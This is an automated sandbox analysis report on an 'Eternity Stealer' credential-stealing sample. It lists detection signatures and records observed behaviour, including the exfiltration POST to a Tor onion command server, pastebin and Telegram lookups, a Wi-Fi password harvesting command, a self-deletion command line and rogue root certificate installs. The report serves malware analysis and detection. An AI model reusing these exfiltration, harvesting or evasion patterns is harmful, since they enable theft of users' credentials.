Windows Analysis Report
Stealer.exe

Overview

General Information

Sample name: Stealer.exe
Analysis ID: 1417452
MD5: 495f88115eabed181e30727f2d2363d3
SHA1: 59cd87a7e30926fc7c51a921b78216119f9d4f1c
SHA256: cfef836fa4515f5371b8a30300098bdb03d4c91b123f0a35252757bc73b388f2

Detection

Eternity Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected Eternity Stealer
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Deletes itself after installation
Found Tor onion address
Installs new ROOT certificates
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Self deletion via cmd or bat file
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: Stealer.exe Avira: detected
Source: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa Avira URL Cloud: Label: malware
Source: Stealer.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Stealer.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: unknown DNS query: name: pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM=&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw==&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg==&t=MzI3
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 9200
Source: unknown Network traffic detected: HTTP traffic on port 9200 -> 49166
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: Yara match File source: Stealer.exe, type: SAMPLE
Source: Yara match File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.166.166.142:9200
Source: global traffic HTTP traffic detected: GET /tor_proxies HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/X2Ddjiv0 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 110240Expect: 100-continueConnection: Keep-AliveData Raw: Data Ascii:
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 172.67.34.170 172.67.34.170
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Users\user\Desktop\Stealer.exe DNS query: name: ip-api.com
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: ip-api.com
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.comp
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://t.me
Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://t.mep
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwA
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Stealer.exe String found in binary or memory: https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/X2Ddjiv0
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/X2Ddjiv0p
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/cription
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/tor_proxies
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/tor_proxiesp
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Stealer.exe, qq16.cs .Net Code: MakeScreenshot

System Summary

Source: Stealer.exe, type: SAMPLE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Stealer.exe, 00000000.00000000.334000781.0000000000B26000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
Source: Stealer.exe, 00000000.00000002.466352660.000000000035D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Stealer.exe
Source: Stealer.exe Binary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: bcrypt.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: credssp.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rpcrtremote.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: wbemcomn2.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ntdsapi.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\netsh.exe Section loaded: credui.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mpr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: odbc32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpqec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: qutil.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ws2help.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: version.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nci.dll
Source: C:\Windows\System32\netsh.exe Section loaded: devrtl.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: webio.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: atl.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: napmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: certcli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netutils.dll
Source: C:\Windows\System32\netsh.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ndfapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wdi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: secur32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: tdh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanutil.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pcollab.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanhlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: cryptbase.dll
Source: Stealer.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .csproj2
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/0@5/5
Source: C:\Users\user\Desktop\Stealer.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Stealer.exe Mutant created: \Sessions\1\BaseNamedObjects\npbouttkra
Source: C:\Users\user\Desktop\Stealer.exe File created: C:\Users\user\AppData\Local\Temp\tmpC8CC.tmp
Source: C:\Windows\System32\cmd.exe Console Write: ...................J....................................@c.J..... ......0.-...............jw..............-.............f.................N.....
Source: Stealer.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Stealer.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Stealer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Stealer.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Stealer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Users\user\Desktop\Stealer.exe "C:\Users\user\Desktop\Stealer.exe"
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\Desktop\Stealer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Users\user\Desktop\Stealer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\Stealer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Stealer.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Stealer.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Stealer.exe Static PE information: 0x81805410 [Sat Nov 6 15:43:12 2038 UTC]
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DA79CD push ebx; retf 0_2_000007FE93DA79DA
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D9D980 pushad ; iretd 0_2_000007FE93D9D929
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D800BD pushad ; iretd 0_2_000007FE93D800C1
Source: Stealer.exe, mQ.cs High entropy of concatenated method names: '_003CPerformSelfDestruct_003Eb__1_0', '_003CPerformSelfDestruct_003Eb__1_1', '_003CPerformSelfDestruct_003Eb__1_2', 'HandleSelfDestruct', 'Iqvoaankwbsmkeovdsfoek', 'Iuvlwqesyazuazlxlvwmse', 'Idjirxbssjfcxsxjblftyf', 'Ipyirndbhzenzwaglixhwt', 'Icbxquhcchziremzkgwyky', 'Iwxcwnfbitkwelqzupxifu'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\Stealer.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\cmd.exe File deleted: c:\users\user\desktop\stealer.exe
Source: C:\Users\user\Desktop\Stealer.exe Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 9200
Source: unknown Network traffic detected: HTTP traffic on port 9200 -> 49166
Source: C:\Users\user\Desktop\Stealer.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\Desktop\Stealer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\Stealer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

